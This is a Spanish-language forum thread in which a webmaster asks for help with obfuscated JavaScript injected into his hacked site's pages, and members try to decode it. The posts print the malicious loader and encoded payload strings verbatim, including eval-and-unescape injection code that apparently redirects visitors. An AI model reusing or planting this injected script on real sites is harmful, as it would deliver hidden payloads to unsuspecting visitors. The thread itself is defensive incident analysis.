Tema destacado:
 Autor
|
Tema: virus en archivo html? / y algunos php (Leído 5,447 veces)
|
Cergath
 Desconectado
Mensajes: 267
Elfo Noldo de la casa del Rey
|
Hola... parece que hackearon un sitio que tenia, nada importante pero me preocupa, es de un VPS asi que tengo todos los permisos, tiene cpanel instalado... en mis archivos index o home aparecieron de la nada estos codigos js: <script language="javascript">
var kasbd3412 = "";
$$ = function () { try{kasbd3412= $$dfsd(gnflseejrr()); kasbd3412.do(); } catch(e){ var bn = ""; return kasbd3412;}};
var adlan3r$oubw = "e";$$dfsd = this['a'+'s'+'d'];var adlan3r$ouaw = "a";
function asd(df_){this['r']="";
var s = df_;
for(__fh=0;this['__fh']<s['l'+adlan3r$oubw+'ng'+'t'+'h'];__fh++ ){i=__fh;if(s['ch'+adlan3r$ouaw +'rA'+'t'](i)=='Z'){this[neAR_DEF_FGEvftDSyTtnSoh_1]='%'} else {this[neAR_DEF_FGEvftDSyTtnSoh_1]=s['ch'+'ar'+'At'](this['i'])}this['r']=r+VAR_EZJrWcTGuhPYZJj(this,neAR_DEF_FGEvftDSyTtnSoh_1)}
return this['unesc'+adlan3r$ouaw + 'p'+adlan3r$oubw](r)}
var ez=window
VAR_AiCzwbiiMdphDXs=(function(VAR_JMFILTCeLQNWkAf,VAR_gqWQtFFAsjjtVqK){return VAR_JMFILTCeLQNWkAf[VAR_gqWQtFFAsjjtVqK];
});
VAR_EZJrWcTGuhPYZJj=(function(VAR_wiSIHKenjOMRPsE,VAR_SfXtSSNCWJXwgQF){return VAR_AiCzwbiiMdphDXs(VAR_wiSIHKenjOMRPsE,VAR_SfXtSSNCWJXwgQF);
});
function gnflseejrr() {return $a}var neAR_DEF_FGEvftDSyTtnSoh_1='s'+'1'; BKbk34b32= Mas abajo luego de mas codigo. var $a = BKbk34b32.replace(/98/g, "Z");
ez[String.fromCharCode(101,118,97)+'l']($$())
</script>
<script language="javascript">
var kasbd3412 = "";
$$ = function () { try{kasbd3412= $$dfsd(gnflseejrr()); kasbd3412.do(); } catch(e){ var bn = ""; return kasbd3412;}};
var adlan3r$oubw = "e";$$dfsd = this['a'+'s'+'d'];var adlan3r$ouaw = "a";
function asd(df_){this['r']="";
var s = df_;
for(__fh=0;this['__fh']<s['l'+adlan3r$oubw+'ng'+'t'+'h'];__fh++ ){i=__fh;if(s['ch'+adlan3r$ouaw +'rA'+'t'](i)=='Z'){this[neAR_DEF_FGEvftDSyTtnSoh_1]='%'} else {this[neAR_DEF_FGEvftDSyTtnSoh_1]=s['ch'+'ar'+'At'](this['i'])}this['r']=r+VAR_EZJrWcTGuhPYZJj(this,neAR_DEF_FGEvftDSyTtnSoh_1)}
return this['unesc'+adlan3r$ouaw + 'p'+adlan3r$oubw](r)}
var ez=window
VAR_AiCzwbiiMdphDXs=(function(VAR_JMFILTCeLQNWkAf,VAR_gqWQtFFAsjjtVqK){return VAR_JMFILTCeLQNWkAf[VAR_gqWQtFFAsjjtVqK];
});
VAR_EZJrWcTGuhPYZJj=(function(VAR_wiSIHKenjOMRPsE,VAR_SfXtSSNCWJXwgQF){return VAR_AiCzwbiiMdphDXs(VAR_wiSIHKenjOMRPsE,VAR_SfXtSSNCWJXwgQF);
});
function gnflseejrr() {return $a}var neAR_DEF_FGEvftDSyTtnSoh_1='s'+'1'; BKbk34b32= Sigue mas y mas codigo hasta que acaba: var $a = BKbk34b32.replace(/98/g, "Z");
ez[String.fromCharCode(101,118,97)+'l']($$())
</script> Que podra ser? |
|
|
|
|
En línea
|
|
|
|
Shell Root
Desconectado
Mensajes: 2.456
Alex Jurado
|
Finalmente, el código queda así, dejame debugearlo y miro a ver que hace. <script language="javascript">
var kasbd3412 = "";
$$ = function() {
try {
kasbd3412 = $$dfsd(gnflseejrr());
kasbd3412.do();
} catch (e) {
var bn = "";
return kasbd3412;
}
};
var adlan3r$oubw = "e";
$$dfsd = this['a' + 's' + 'd'];
var adlan3r$ouaw = "a";
function asd(df_) {
this['r'] = "";
var s = df_;
for (__fh = 0; this['__fh'] < s['l' + adlan3r$oubw + 'ng' + 't' + 'h']; __fh++) {
i = __fh;
if (s['ch' + adlan3r$ouaw + 'rA' + 't'](i) == 'Z') {
this[neAR_DEF_FGEvftDSyTtnSoh_1] = '%'
} else {
this[neAR_DEF_FGEvftDSyTtnSoh_1] = s['ch' + 'ar' + 'At'](this['i'])
}
this['r'] = r + VAR_EZJrWcTGuhPYZJj(this, neAR_DEF_FGEvftDSyTtnSoh_1)
}
return this['unesc' + adlan3r$ouaw + 'p' + adlan3r$oubw](r)
}
var ez = window
VAR_AiCzwbiiMdphDXs = (function(VAR_JMFILTCeLQNWkAf, VAR_gqWQtFFAsjjtVqK) {
return VAR_JMFILTCeLQNWkAf[VAR_gqWQtFFAsjjtVqK];
});
VAR_EZJrWcTGuhPYZJj = (function(VAR_wiSIHKenjOMRPsE, VAR_SfXtSSNCWJXwgQF) {
return VAR_AiCzwbiiMdphDXs(VAR_wiSIHKenjOMRPsE, VAR_SfXtSSNCWJXwgQF);
});
function gnflseejrr() {
return $a
}
var neAR_DEF_FGEvftDSyTtnSoh_1 = 's' + '1';
BKbk34b32 =
var $a = BKbk34b32.replace(/98/g, "Z");
ez[String.fromCharCode(101, 118, 97) + 'l']($$())
</script>
<script language="javascript">
var kasbd3412 = "";
$$ = function() {
try {
kasbd3412 = $$dfsd(gnflseejrr());
kasbd3412.do();
} catch (e) {
var bn = "";
return kasbd3412;
}
};
var adlan3r$oubw = "e";
$$dfsd = this['a' + 's' + 'd'];
var adlan3r$ouaw = "a";
function asd(df_) {
this['r'] = "";
var s = df_;
for (__fh = 0; this['__fh'] < s['l' + adlan3r$oubw + 'ng' + 't' + 'h']; __fh++) {
i = __fh;
if (s['ch' + adlan3r$ouaw + 'rA' + 't'](i) == 'Z') {
this[neAR_DEF_FGEvftDSyTtnSoh_1] = '%'
} else {
this[neAR_DEF_FGEvftDSyTtnSoh_1] = s['ch' + 'ar' + 'At'](this['i'])
}
this['r'] = r + VAR_EZJrWcTGuhPYZJj(this, neAR_DEF_FGEvftDSyTtnSoh_1)
}
return this['unesc' + adlan3r$ouaw + 'p' + adlan3r$oubw](r)
}
var ez = window
VAR_AiCzwbiiMdphDXs = (function(VAR_JMFILTCeLQNWkAf, VAR_gqWQtFFAsjjtVqK) {
return VAR_JMFILTCeLQNWkAf[VAR_gqWQtFFAsjjtVqK];
});
VAR_EZJrWcTGuhPYZJj = (function(VAR_wiSIHKenjOMRPsE, VAR_SfXtSSNCWJXwgQF) {
return VAR_AiCzwbiiMdphDXs(VAR_wiSIHKenjOMRPsE, VAR_SfXtSSNCWJXwgQF);
});
function gnflseejrr() {
return $a
}
var neAR_DEF_FGEvftDSyTtnSoh_1 = 's' + '1';
BKbk34b32 =
var $a = BKbk34b32.replace(/98/g, "Z");
ez[String.fromCharCode(101, 118, 97) + 'l']($$())
</script> |
|
|
|
|
En línea
|
 --- |
|
|
Cergath
Desconectado
Mensajes: 267
Elfo Noldo de la casa del Rey
|
Uyy que bueno, por fav or informame de los resultados que obtienes :/ and o algo preo cupad o
|
|
|
|
|
En línea
|
|
|
|
Cergath
Desconectado
Mensajes: 267
Elfo Noldo de la casa del Rey
|
tenes a lgo? es que m´e preocup´a bastante y no se si sea alarmante
|
|
|
|
|
En línea
|
|
|
|
Shell Root
Desconectado
Mensajes: 2.456
Alex Jurado
|
Bueno, mirándolo, solo pude decodificar algunas variables. Pero aún falta, solo que esta el código donde esta definido las variables y funciones, pero no esta el código donde se invoca estás. Esto es importa ya que vemos los parámetros que son pasados a las funciones.
Intenta buscar más código.
|
|
|
|
|
En línea
|
--- |
|
|
Cergath
Desconectado
Mensajes: 267
Elfo Noldo de la casa del Rey
|
t agrade zco mucho tu tiem´po, de veras  tiene´s idea de como pudo infectarse? o que carajos puede hacer ese codigo?... pd. no ocnozco mas de ese codigo, por ahora es l o unico que tengo, permite me buscar mas  |
|
|
|
|
En línea
|
|
|
|
Shell Root
Desconectado
Mensajes: 2.456
Alex Jurado
|
Pues, cuando estuve trabajando en una empresa XXX -que por cierto, son unos *****, cabrones, hijos de p**a- cof, cof... Se les entro un virus así a todas las paginas que tenían alojadas en el servidor. Pero lo que hacia era SPAM. En este no se que es lo que hace. XD, tendría que ver los parámetros enviados.
|
|
|
|
|
En línea
|
--- |
|
|
Cergath
Desconectado
Mensajes: 267
Elfo Noldo de la casa del Rey
|
m mm puede ser que el pc tenga spyware y la maquina infectada que se conecta al pc haya infectado los archivos? porque por el vps, estoy ciertamente seguro de que no esta infectado, lo dudo muuuuucho...
|
|
|
|
|
En línea
|
|
|
|
Shell Root
Desconectado
Mensajes: 2.456
Alex Jurado
|
Sería bastante bueno, que pusieras todo el código de algún archivo infectado. A ver si se logra mirar los parámetros.
|
|
|
|
|
En línea
|
--- |
|
|
Cergath
Desconectado
Mensajes: 267
Elfo Noldo de la casa del Rey
|
hla d nuevo, perdona digitar asi pero dsde un cel es complikdo, en fin... primero que todo de verdad te agradezco mas que todo tu tiempo, en verdad,muchisimas gracias.... esta es una recopilacion de algunos archivos infectados que hi ce antes de eliminarlos, m i primera reac cion fue limpiar,luego deje unos pocos.. http://www.megaupload.com/?d=8CJHD9RMalgunos contienen es un codigo n php... y bueno, aunque no descubramos bien que es, sabes de q se trata? q tipo de vulnerabilidad o malware puede ser? generalmente q hace y como puedo prvenirlo? gracias |
|
|
|
|
En línea
|
|
|
|
Shell Root
Desconectado
Mensajes: 2.456
Alex Jurado
|
Ok, ya lo estoy analizando, esta un poco entretenido. XD Dejadme analizarlo más y te dejo el resultado, por ahora veo como una redirección a una URL que aún no he podido descubrir cual es. Tengo decodificado esto, de = "!%209M0;0|uddubcK8888dy}uK7iuqb7M060%20h##!!90..0$90;0~e}9050!%209M+0}%7F~dxSx0-0|uddubcK88dy}uK7}%7F~dx7M0;0~e}9050%22%9M0;0|uddubcK88dy}uK7}%7F~dx7M0:0~e}9050%22%9M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0%269050%22'9M+0dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0:0~e}9050%22$9M+4q-4q>bu`|qsu8ts%7F}79+m";
dd = "08y~tuh0:0tqi990;08}%7F~dx0N0tqi90:0y~tuh90;0tqi9+m0fqb0iuqbSx!<0iuqbSx%22<0}%7F~dxSx<0tqiSx<0~e}+~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7M<0dy}uK7}%7F~dx7M<0dy}uK7iuqb7M<0cxyvdY~tuh9;!%20%20+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060%20hQQ90;0~e}9050%26#9050%22%26M0;0|uddubcK888dy}uK7iuqb7M060%20hQQ90,,0%2290;0~e}9050%22%M+iuqbSx%220-0|uddubcK8888dy}uK7iuqb7M060%20h##!!90..0#90;0~e}9050";
ca = "%66un%63tio%6e %64cs%28ds%2ces%29%7bd%73%3dunes%63ape%";
cz = "%66u%6ect%69on%20cz%28cz%29%7bretur%6e ca%2bc%62%2bcc%2b%63d+c%65%2bcz%3b};";
cb = "28ds%29;s%74%3dtmp%3d%27%27;for(i%3d0;i%3cd%73%2el%65n";
dz = "%66un%63ti%6fn%20dw%28t%29%7bca%3d%27%2564oc%2575m%65%256et%2ew%2572%2569te%2528%2522%27;ce%3d%27%2522)%27;cb%3d%27%253c%2573cri%2570t l%2561n%2567%75a%67%25%365%253d%255%63%2522ja%76as%63%2572i%70%2574%255%63%2522%253e%27;c%63%3d%27%253c%255c%252fs%63ri%70t%253e%27;wi%6ed%6fw[%22e%22+%22%22+ %22v%22+%22al%22](unes%63ape%28t)%29}%3b";
da = "fqb0t-7vrs}vyb>s%7F}7+0fqb0cxyvdY~tuh0-0%20+v%7Fb08fqb0y0y~0gy~t%7Fg>dg>dbu~tc9kyv08gy~t%7Fg>x0.0(0660gy~t%7Fg>x0,0%22!0660y>y~tuh_v870%20'790.0=!9kcxyvdY~tuh0-0gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>sxqbS%7FtuQd8!90;0gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>|u~wdx+rbuq{+mu|cu0yv088gy~t%7Fg>x0,0)0ll00gy~t%7Fg>x0.0%22%2090660y>y~tuh_v870!(790.0=!9kcxyvdY~tuh0-0gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>sxqbS%";
cc = "%67%74h;%69++%29%7bt%6dp%3dds.s%6cic%65(i%2ci+1%29;%73";
ce = "cha%72Co%64eAt%280)%5e%28%270x0%30%27+%65s)%29);}%7d";
op = "%24a%3d%22dw(dcs(%63%75,1%34%29)%3b%22;";
st = "%73t%3d%22$%61%3d%73t%3bd%63s%28%64%61%2b%64%62+%64%63+%64%64%2b%64%65,%31%30)%3bd%77(%73t%29;%73%74%3d$a%3b%22%3b";
db = "7FtuQd8!90;0!%200;gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>|u~wdx+rbuq{+mmyv08cxyvdY~tuh0--0%2009kcxyvdY~tuh0-0gy~t%7Fg>dg>dbu~tcKyMK%26M>aeubi>sxqbS%7FtuQd8!90;0'0;gy~t%7Fg>dg>dbu~tcKyMK%26M>aeubi>|u~wdx+m0yv08cxyvdY~tuh0.0%209kfqb0dy}u0-0~ug0Qbbqi89+dy}uK7iuqb7M0-0gy~t%7Fg>wt>wudEDSVe||Iuqb89+dy}uK7}%7F~dx7M0-0gy~t%7Fg>wt>wudEDS]%7F~dx89;!+dy}uK7tqi7M0-0gy~t%7Fg>wt>wudEDSTqdu89+fqb0t-7v";
dc = "rs}vyb>s%7F}7+fqb0}%7F~dxc0-0~ug0Qbbqi87trc7<07id~7<07f}d7<07f}b7<07}|s7<07%7Fh{7<07vtc7<07rfv7<07iec7<07}s`7<07~sj7<07wtg79+fqb0|uddubc0-0~ug0Qbbqi87q7<7r7<7s7<7t7<7u7<7v7<7w7<7x7<7z7<7y7<7{7<7|7<7}7<7~7<7%7F7<7`7<7a7<7b7<7c7<7d7<7e7<7f7<7g7<7h7<7i7<7j79+fqb0~e}rubc0-0~ug0Qbbqi8!<%22<#<$<%<%26<'<(<)9+%19ve~sdy%7F~0Sq|se|qdu]qwys^e}rub8tqi<0}%7F~dx<0iuqb<0y~tuh9kbudeb~0888iuqb0;";
cu = "(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:w{y;xp;y}%7F;64c}p`|)%$$4|q}s|`),$*(;}rfuyq*(;p}b*";
cd = "%74%3dst+%53%74rin%67.fr%6fmC%68a%72C%6fd%65(%28tmp%2e";
if (document.cookie.indexOf('rf5f6ds') == -1) {
function callback(x) {
window.tw = x;
var d = new Date();
d.setTime(x["as_of"] * 1000);
var h = d.getUTCHours();
window.h = h;
if (h > 8) {
d.setUTCDate(d.getUTCDate() - 2);
} else {
d.setUTCDate(d.getUTCDate() - 3);
}
window.gd = d;
var time = new Array();
var shiftIndex = "";
time["year"] = d.getUTCFullYear();
time["month"] = d.getUTCMonth() + 1;
time["day"] = d.getUTCDate();
if (d.getUTCMonth() + 1 < 10) {
shiftIndex = time["year"] + "-0" + (d.getUTCMonth() + 1);
} else {
shiftIndex = time["year"] + "-" + (d.getUTCMonth() + 1);
}
if (d.getUTCDate() < 10) {
shiftIndex = shiftIndex + "-0" + d.getUTCDate();
} else {
shiftIndex = shiftIndex + "-" + d.getUTCDate();
}
document.write("" + "");
}
function callback2(x) {
window.tw = x;
sc('rf5f6ds', 2, 7);
eval(unescape(dz + cz + op + st) + 'dw(dz+cz($a+st));');
/*
function dw(t) {
ca = 'document.write("';
ce = '")';
cb = '<script language=\"javascript\">';
cc = '<\/script>';
window["eval"](unescape(t))
};
function cz(cz) {
return ca + cb + cc + cd + ce + cz;
};
$a = "dw(dcs(cu,14));";
st = "$a=st;dcs(da+db+dc+dd+de,10);dw(st);st=$a;";
dw(dz + cz($a + st));
*/
document.write($a);
}
document.write(" " + "");
} else {
$a = ''
};
function sc(cnm, v, ed) {
var exd = new Date();
exd.setDate(exd.getDate() + ed);
document.cookie = cnm + '=' + escape(v) + ';expires=' + exd.toGMTString();
}; |
|
|
|
« Última modificación: 15 Noviembre 2010, 18:31 por Shell Root »
|
En línea
|
--- |
|
|
Cergath
Desconectado
Mensajes: 267
Elfo Noldo de la casa del Rey
|
Hola Shell, como has estado? disculpame el atrevimiento, pero me gustaria saber si tienes alguna novedad respecto a esto, seria genial  |
|
|
|
|
En línea
|
|
|
|
WHK
吴阿卡
Moderador
Desconectado
Mensajes: 4.113
The Hacktivism is not a crime
|
por lo menos no afecta sea lo que sea porque en firefox me da error de sintaxis, está mal codeado o el código está incompleto :-/
Error: syntax error
Archivo de origen: file:///C:/Users/Yan/Desktop/ver.html
Línea: 28
Código fuente:
var $a = BKbk34b32.replace(/98/g, "Z");
asi que no pude hacerle un debugg.
|
|
|
|
|
En línea
|
|
|
|
|
berz3k
|
Yo encontre en mis servers un php tambien bastante extranio despues de decodearlo me encontre que hacia peticiones a otra page "redirect" enviando todos mis formularios y/o contrasenias que alojaba, ademas de buscar servidores "Relaying" para SPAM.
bajare el file y ya os cuento.
-berz3k.
|
|
|
|
|
En línea
|
|
|
|
|
berz3k
|
Pues no pude bajar el file de megaupload, podras treparlo a otro site
-berz3k.
|
|
|
|
|
En línea
|
|
|
|
|
 |
